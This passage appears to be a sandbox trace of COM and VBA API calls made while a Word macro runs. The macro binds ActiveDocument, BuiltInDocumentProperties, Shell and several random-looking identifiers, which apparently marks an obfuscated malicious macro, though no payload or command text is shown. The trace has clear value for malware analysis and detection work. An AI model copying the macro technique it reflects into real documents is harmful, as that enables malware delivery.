ppTypeAttr=0x12527c, pDummy=0x0) returned 0x0 [0023.215] ITypeInfo:LocalReleaseTypeAttr (This=0x569eed4) returned 0x5725de8 [0023.215] IUnknown:Release (This=0x569eed4) returned 0x2 [0023.215] IUnknown:Release (This=0x569eed4) returned 0x2 [0023.215] IUnknown:QueryInterface (in: This=0x569eed4, riid=0x720fb92c*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1252d8 | out: ppvObject=0x1252d8*=0x0) returned 0x80004002 [0023.215] IUnknown:QueryInterface (in: This=0x569eed4, riid=0x7213e338*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125290 | out: ppvObject=0x125290*=0x0) returned 0x80004002 [0023.215] IUnknown:Release (This=0x569eed4) returned 0x2 [0023.215] IUnknown:AddRef (This=0x569eed4) returned 0x3 [0023.215] IUnknown:Release (This=0x569eed4) returned 0x2 [0023.215] IUnknown:QueryInterface (in: This=0x569eed4, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125418 | out: ppvObject=0x125418*=0x0) returned 0x80004002 [0023.215] IUnknown:AddRef (This=0x569eed4) returned 0x3 [0023.215] IUnknown:Release (This=0x569eed4) returned 0x3 [0023.215] IUnknown:QueryInterface (in: This=0x569eed4, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125470 | out: ppvObject=0x125470*=0x0) returned 0x80004002 [0023.215] IUnknown:QueryInterface (in: This=0x569eed4, riid=0x720fb91c*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125474 | out: ppvObject=0x125474*=0x0) returned 0x80004002 [0023.218] IUnknown:QueryInterface (in: This=0x569ef2c, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125470 | out: ppvObject=0x125470*=0x0) returned 0x80004002 [0023.218] IUnknown:QueryInterface (in: This=0x569ef2c, riid=0x720fb91c*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125458 | out: ppvObject=0x125458*=0x0) returned 0x80004002 [0023.218] ITypeInfo:GetTypeComp (in: This=0x569ef2c, ppTComp=0x12545c | out: ppTComp=0x12545c*=0x569ef30) returned 0x0 [0023.218] CRetailMalloc_Alloc () returned 0x581ab40 [0023.218] IUnknown:AddRef (This=0x569ef30) returned 0x3 [0023.218] IUnknown:Release (This=0x569ef30) returned 0x2 [0023.218] IUnknown:Release (This=0x569ef2c) returned 0x1 [0023.218] IUnknown:Release (This=0x569eed4) returned 0x3 [0023.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2aca, cbMultiByte=15, lpWideCharStr=0x125324, cchWideChar=16 | out: lpWideCharStr="ActiveDocument") returned 15 [0023.218] ITypeComp:RemoteBind (in: This=0x569ef30, szName="ActiveDocument", lHashVal=0x105cd3, wFlags=0x3, ppTInfo=0x1252f0, pDescKind=0x125300, ppFuncDesc=0x1252f4, ppVarDesc=0x7762f44, ppTypeComp=0x12545c, pDummy=0x3 | out: ppTInfo=0x1252f0*=0x569ef2c, pDescKind=0x125300*=1, ppFuncDesc=0x1252f4, ppVarDesc=0x7762f44, ppTypeComp=0x12545c*=0x0, pDummy=0x3) returned 0x0 [0023.218] ITypeInfo:RemoteGetTypeAttr (in: This=0x569ef2c, ppTypeAttr=0x125304, pDummy=0x7762f44 | out: ppTypeAttr=0x125304, pDummy=0x7762f44*=0xffff) returned 0x0 [0023.218] ITypeInfo:LocalReleaseTypeAttr (This=0x569ef2c) returned 0x51e7718 [0023.218] ITypeInfo:GetRefTypeInfo (in: This=0x569ef2c, hreftype=0x9538, ppTInfo=0x125174 | out: ppTInfo=0x125174*=0x569ef84) returned 0x0 [0023.218] IUnknown:QueryInterface (in: This=0x569ef84, riid=0x720fb92c*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1251b0 | out: ppvObject=0x1251b0*=0x0) returned 0x80004002 [0023.218] ITypeInfo:RemoteGetTypeAttr (in: This=0x569ef84, ppTypeAttr=0x1251b4, pDummy=0x0 | out: ppTypeAttr=0x1251b4, pDummy=0x0) returned 0x0 [0023.218] ITypeInfo:LocalReleaseTypeAttr (This=0x569ef84) returned 0x51e7718 [0023.218] IUnknown:Release (This=0x569ef84) returned 0x2 [0023.218] IUnknown:Release (This=0x569ef84) returned 0x2 [0023.218] IUnknown:Release (This=0x569ef84) returned 0x2 [0023.218] IUnknown:QueryInterface (in: This=0x569ef2c, riid=0x720ea230*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x125274 | out: ppvObject=0x125274*=0x569ef2c) returned 0x0 [0023.219] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x569ef2c, memid=3, invkind=2, pFuncIndex=0x125278 | out: pFuncIndex=0x125278*=0x6) returned 0x0 [0023.219] ITypeInfo2:GetFuncCustData (in: This=0x569ef2c, index=0x6, GUID=0x72123510*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x12525c | out: pVarVal=0x12525c*(varType=0x0, wReserved1=0x12, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0023.219] IUnknown:Release (This=0x569ef2c) returned 0x2 [0023.219] IUnknown:QueryInterface (in: This=0x569ef84, riid=0x720fb92c*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125238 | out: ppvObject=0x125238*=0x0) returned 0x80004002 [0023.219] IUnknown:QueryInterface (in: This=0x569ef84, riid=0x7213e338*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1251f0 | out: ppvObject=0x1251f0*=0x0) returned 0x80004002 [0023.219] IUnknown:Release (This=0x569ef84) returned 0x2 [0023.219] IUnknown:QueryInterface (in: This=0x569ef84, riid=0x720fb92c*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125238 | out: ppvObject=0x125238*=0x0) returned 0x80004002 [0023.219] IUnknown:QueryInterface (in: This=0x569ef84, riid=0x7213e338*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1251f0 | out: ppvObject=0x1251f0*=0x0) returned 0x80004002 [0023.219] IUnknown:Release (This=0x569ef84) returned 0x2 [0023.219] IUnknown:AddRef (This=0x569ef2c) returned 0x3 [0023.219] ITypeInfo:LocalReleaseFuncDesc (This=0x569ef2c) returned 0x5725de8 [0023.219] IUnknown:Release (This=0x569ef2c) returned 0x2 [0023.219] IUnknown:QueryInterface (in: This=0x569ef2c, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1253a8 | out: ppvObject=0x1253a8*=0x0) returned 0x80004002 [0023.219] IUnknown:AddRef (This=0x569ef2c) returned 0x3 [0023.219] IUnknown:Release (This=0x569ef2c) returned 0x3 [0023.219] IUnknown:QueryInterface (in: This=0x569ef2c, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1253fc | out: ppvObject=0x1253fc*=0x0) returned 0x80004002 [0023.219] IUnknown:QueryInterface (in: This=0x569ef2c, riid=0x720fb91c*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125400 | out: ppvObject=0x125400*=0x0) returned 0x80004002 [0023.219] IUnknown:QueryInterface (in: This=0x569eed4, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125398 | out: ppvObject=0x125398*=0x0) returned 0x80004002 [0023.219] IUnknown:QueryInterface (in: This=0x569eed4, riid=0x720fb91c*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x12538c | out: ppvObject=0x12538c*=0x0) returned 0x80004002 [0023.219] IUnknown:QueryInterface (in: This=0x569eed4, riid=0x720ea230*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x125388 | out: ppvObject=0x125388*=0x569eed4) returned 0x0 [0023.219] ITypeInfo2:GetTypeKind (in: This=0x569eed4, pTypeKind=0x1253d0 | out: pTypeKind=0x1253d0*=5) returned 0x0 [0023.219] IUnknown:Release (This=0x569eed4) returned 0x4 [0023.220] ITypeInfo:LocalReleaseTypeAttr (This=0x569eed4) returned 0x51e7718 [0023.220] IUnknown:Release (This=0x569eed4) returned 0x3 [0023.220] IUnknown:AddRef (This=0x569ef2c) returned 0x4 [0023.220] ITypeInfo:RemoteGetTypeAttr (in: This=0x569ef2c, ppTypeAttr=0x125430, pDummy=0x7878ea8 | out: ppTypeAttr=0x125430, pDummy=0x7878ea8*=0x0) returned 0x0 [0023.220] ITypeInfo:LocalReleaseTypeAttr (This=0x569ef2c) returned 0x51e7718 [0023.220] IUnknown:Release (This=0x569ef2c) returned 0x3 [0023.220] IUnknown:QueryInterface (in: This=0x569efdc, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125488 | out: ppvObject=0x125488*=0x0) returned 0x80004002 [0023.220] IUnknown:QueryInterface (in: This=0x569efdc, riid=0x720fb91c*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125470 | out: ppvObject=0x125470*=0x0) returned 0x80004002 [0023.220] ITypeInfo:GetTypeComp (in: This=0x569efdc, ppTComp=0x125474 | out: ppTComp=0x125474*=0x569efe0) returned 0x0 [0023.220] CRetailMalloc_Alloc () returned 0x581ab10 [0023.220] IUnknown:AddRef (This=0x569efe0) returned 0x4 [0023.220] IUnknown:Release (This=0x569efe0) returned 0x3 [0023.220] IUnknown:Release (This=0x569efdc) returned 0x2 [0023.220] IUnknown:Release (This=0x569ef84) returned 0x2 [0023.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2af6, cbMultiByte=26, lpWideCharStr=0x12533c, cchWideChar=27 | out: lpWideCharStr="BuiltInDocumentProperties") returned 26 [0023.220] ITypeComp:RemoteBind (in: This=0x569efe0, szName="BuiltInDocumentProperties", lHashVal=0x10bb5f, wFlags=0x3, ppTInfo=0x125308, pDescKind=0x125318, ppFuncDesc=0x12530c, ppVarDesc=0x7762f44, ppTypeComp=0x125474, pDummy=0x3 | out: ppTInfo=0x125308*=0x569efdc, pDescKind=0x125318*=1, ppFuncDesc=0x12530c, ppVarDesc=0x7762f44, ppTypeComp=0x125474*=0x0, pDummy=0x3) returned 0x0 [0023.221] ITypeInfo:RemoteGetTypeAttr (in: This=0x569efdc, ppTypeAttr=0x12531c, pDummy=0x7762f44 | out: ppTypeAttr=0x12531c, pDummy=0x7762f44*=0xffff) returned 0x0 [0023.221] ITypeInfo:LocalReleaseTypeAttr (This=0x569efdc) returned 0x5725de8 [0023.221] IUnknown:QueryInterface (in: This=0x569efdc, riid=0x720ea230*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12528c | out: ppvObject=0x12528c*=0x569efdc) returned 0x0 [0023.221] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x569efdc, memid=1000, invkind=2, pFuncIndex=0x125290 | out: pFuncIndex=0x125290*=0x4) returned 0x0 [0023.221] ITypeInfo2:GetFuncCustData (in: This=0x569efdc, index=0x4, GUID=0x72123510*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x125274 | out: pVarVal=0x125274*(varType=0x0, wReserved1=0x12, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0023.221] IUnknown:Release (This=0x569efdc) returned 0x3 [0023.221] IUnknown:AddRef (This=0x569efdc) returned 0x4 [0023.221] ITypeInfo:LocalReleaseFuncDesc (This=0x569efdc) returned 0x51e7718 [0023.221] IUnknown:Release (This=0x569efdc) returned 0x3 [0023.221] IUnknown:QueryInterface (in: This=0x569efdc, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1253c0 | out: ppvObject=0x1253c0*=0x0) returned 0x80004002 [0023.221] IUnknown:AddRef (This=0x569efdc) returned 0x4 [0023.221] IUnknown:Release (This=0x569efdc) returned 0x4 [0023.221] IUnknown:QueryInterface (in: This=0x569efdc, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125414 | out: ppvObject=0x125414*=0x0) returned 0x80004002 [0023.221] IUnknown:QueryInterface (in: This=0x569efdc, riid=0x720fb91c*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125418 | out: ppvObject=0x125418*=0x0) returned 0x80004002 [0023.221] IUnknown:AddRef (This=0x569efdc) returned 0x5 [0023.221] ITypeInfo:RemoteGetTypeAttr (in: This=0x569efdc, ppTypeAttr=0x125400, pDummy=0x7878ea8 | out: ppTypeAttr=0x125400, pDummy=0x7878ea8*=0x0) returned 0x0 [0023.221] ITypeInfo:LocalReleaseTypeAttr (This=0x569efdc) returned 0x5725de8 [0023.221] IUnknown:Release (This=0x569efdc) returned 0x4 [0023.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2b2e, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="sNhYNbxua") returned 10 [0023.222] ITypeComp:RemoteBind (in: This=0x2876550, szName="sNhYNbxua", lHashVal=0x10c0a5, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x262 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x262) returned 0x0 [0023.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2b2e, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="sNhYNbxua") returned 10 [0023.222] ITypeComp:RemoteBind (in: This=0x2875638, szName="sNhYNbxua", lHashVal=0x10c0a5, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x262 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x1, pDummy=0x262) returned 0x0 [0023.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2b2e, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="sNhYNbxua") returned 10 [0023.222] ITypeComp:RemoteBind (in: This=0x2876778, szName="sNhYNbxua", lHashVal=0x10c0a5, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x262 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x2, pDummy=0x262) returned 0x0 [0023.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2b2e, cbMultiByte=10, lpWideCharStr=0x125364, cchWideChar=11 | out: lpWideCharStr="sNhYNbxua") returned 10 [0023.222] ITypeComp:RemoteBind (in: This=0x2876bc8, szName="sNhYNbxua", lHashVal=0x10c0a5, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x262 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x4, pDummy=0x262) returned 0x0 [0023.222] CRetailMalloc_Alloc () returned 0x78b3090 [0023.223] IUnknown:Release (This=0x2876548) returned 0x5 [0023.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46e026a, cbMultiByte=17, lpWideCharStr=0x125374, cchWideChar=18 | out: lpWideCharStr="_B_var_sNhYNbxua") returned 17 [0023.223] ITypeComp:RemoteBind (in: This=0x2876550, szName="_B_var_sNhYNbxua", lHashVal=0x10c9ea, wFlags=0x3, ppTInfo=0x125340, pDescKind=0x125350, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0, pDummy=0x1 | out: ppTInfo=0x125340*=0x0, pDescKind=0x125350*=0, ppFuncDesc=0x125344, ppVarDesc=0x7762f44, ppTypeComp=0x1254d0*=0x0, pDummy=0x1) returned 0x0 [0023.223] CRetailMalloc_Free () returned 0x1b20201 [0023.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f296e, cbMultiByte=6, lpWideCharStr=0x12536c, cchWideChar=7 | out: lpWideCharStr="Shell") returned 6 [0023.223] ITypeComp:RemoteBind (in: This=0x2876550, szName="Shell", lHashVal=0x10d756, wFlags=0x1, ppTInfo=0x125338, pDescKind=0x125348, ppFuncDesc=0x12533c, ppVarDesc=0x7762f44, ppTypeComp=0x1254a4, pDummy=0x3 | out: ppTInfo=0x125338*=0x572d60c, pDescKind=0x125348*=1, ppFuncDesc=0x12533c, ppVarDesc=0x7762f44, ppTypeComp=0x1254a4*=0x0, pDummy=0x3) returned 0x0 [0023.224] ITypeInfo:RemoteGetTypeAttr (in: This=0x572d60c, ppTypeAttr=0x12534c, pDummy=0x7762f44 | out: ppTypeAttr=0x12534c, pDummy=0x7762f44*=0xffff) returned 0x0 [0023.224] ITypeInfo:LocalReleaseTypeAttr (This=0x572d60c) returned 0x5725de8 [0023.224] ITypeInfo:GetRefTypeInfo (in: This=0x572d60c, hreftype=0x320, ppTInfo=0x12528c | out: ppTInfo=0x12528c*=0x572d638) returned 0x0 [0023.224] IUnknown:QueryInterface (in: This=0x572d638, riid=0x720fb92c*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1252c8 | out: ppvObject=0x1252c8*=0x0) returned 0x80004002 [0023.224] ITypeInfo:RemoteGetTypeAttr (in: This=0x572d638, ppTypeAttr=0x1252cc, pDummy=0x0 | out: ppTypeAttr=0x1252cc, pDummy=0x0) returned 0x0 [0023.224] ITypeInfo:LocalReleaseTypeAttr (This=0x572d638) returned 0x5725de8 [0023.224] IUnknown:Release (This=0x572d638) returned 0x1 [0023.224] IUnknown:Release (This=0x572d638) returned 0x1 [0023.224] IUnknown:QueryInterface (in: This=0x572d60c, riid=0x720ea230*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12522c | out: ppvObject=0x12522c*=0x572d60c) returned 0x0 [0023.224] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x572d60c, memid=1610612745, invkind=1, pFuncIndex=0x125240 | out: pFuncIndex=0x125240*=0x9) returned 0x0 [0023.224] ITypeInfo2:GetParamCustData (in: This=0x572d60c, indexFunc=0x9, indexParam=0x1, GUID=0x7212fa28*(Data1=0x270d72b0, Data2=0xffb8, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xbd, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x26, [7]=0xee)), pVarVal=0x12521c | out: pVarVal=0x12521c*(varType=0x0, wReserved1=0x544, wReserved2=0xe0b8, wReserved3=0x578, varVal1=0x51e771c, varVal2=0x0)) returned 0x0 [0023.224] IUnknown:Release (This=0x572d60c) returned 0x1 [0023.224] IUnknown:QueryInterface (in: This=0x572d60c, riid=0x720ea230*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1252bc | out: ppvObject=0x1252bc*=0x572d60c) returned 0x0 [0023.224] ITypeInfo2:GetFuncIndexOfMemId (in: This=0x572d60c, memid=1610612745, invkind=1, pFuncIndex=0x1252c0 | out: pFuncIndex=0x1252c0*=0x9) returned 0x0 [0023.224] ITypeInfo2:GetFuncCustData (in: This=0x572d60c, index=0x9, GUID=0x72123510*(Data1=0x50867b00, Data2=0xbb69, Data3=0x11d0, Data4=([0]=0xa8, [1]=0xff, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x59)), pVarVal=0x1252a4 | out: pVarVal=0x1252a4*(varType=0x0, wReserved1=0x12, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0 [0023.224] IUnknown:Release (This=0x572d60c) returned 0x1 [0023.224] IUnknown:QueryInterface (in: This=0x572d638, riid=0x720fb91c*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125258 | out: ppvObject=0x125258*=0x0) returned 0x80004002 [0023.224] IUnknown:QueryInterface (in: This=0x572d638, riid=0x720fb92c*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125280 | out: ppvObject=0x125280*=0x0) returned 0x80004002 [0023.224] IUnknown:QueryInterface (in: This=0x572d638, riid=0x7213e338*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125238 | out: ppvObject=0x125238*=0x0) returned 0x80004002 [0023.225] IUnknown:Release (This=0x572d638) returned 0x1 [0023.225] IUnknown:AddRef (This=0x572d60c) returned 0x2 [0023.225] ITypeInfo:LocalReleaseFuncDesc (This=0x572d60c) returned 0x51e7718 [0023.225] IUnknown:Release (This=0x572d60c) returned 0x1 [0023.225] IUnknown:QueryInterface (in: This=0x572d60c, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1253f0 | out: ppvObject=0x1253f0*=0x0) returned 0x80004002 [0023.225] IUnknown:AddRef (This=0x572d60c) returned 0x2 [0023.225] IUnknown:Release (This=0x572d60c) returned 0x2 [0023.225] IUnknown:QueryInterface (in: This=0x572d60c, riid=0x720eb89c*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125444 | out: ppvObject=0x125444*=0x0) returned 0x80004002 [0023.225] IUnknown:QueryInterface (in: This=0x572d60c, riid=0x720fb91c*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x125448 | out: ppvObject=0x125448*=0x0) returned 0x80004002 [0023.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x57986fc, cbMultiByte=11, lpWideCharStr=0x4740a24, cchWideChar=24 | out: lpWideCharStr="zAEMZgBXATm") returned 11 [0023.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579870c, cbMultiByte=7, lpWideCharStr=0x4740a78, cchWideChar=16 | out: lpWideCharStr="ZAhxtXm") returned 7 [0023.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579871a, cbMultiByte=11, lpWideCharStr=0x4740afc, cchWideChar=24 | out: lpWideCharStr="xBCMkTRArZs") returned 11 [0023.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579872c, cbMultiByte=10, lpWideCharStr=0x4740c9c, cchWideChar=22 | out: lpWideCharStr="mcfPrznnKB") returned 10 [0023.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579873c, cbMultiByte=11, lpWideCharStr=0x4740dba, cchWideChar=24 | out: lpWideCharStr="ztXTTLkrshU") returned 11 [0023.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579874e, cbMultiByte=7, lpWideCharStr=0x4740eda, cchWideChar=16 | out: lpWideCharStr="BAnrHda") returned 7 [0023.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x579875c, cbMultiByte=9, lpWideCharStr=0x4740ff2, cchWideChar=20 | out: lpWideCharStr="BLfMSWdEN") returned 9 [0023.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f2b7a, cbMultiByte=8, lpWideCharStr=0x125364, cchWideChar=9 | out: lpWideCharStr="TAeDWpm") returned 8 [0023.226] ITypeComp:RemoteBind (in: This=0x2876550, szName="TAeDWpm", lHashVal=0x1032e2, wFlags=0x3, ppTInfo=0x125330, pDescKind=0x125340, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x266 | out: ppTInfo=0x125330*=0x0, pDescKind=0x125340*=0, ppFuncDesc=0x125334, ppVarDesc=0x1254d0, ppTypeComp=0x0, pDummy=0x266) returned 0x0 [0023.226] MultiByteToWideChar (in: 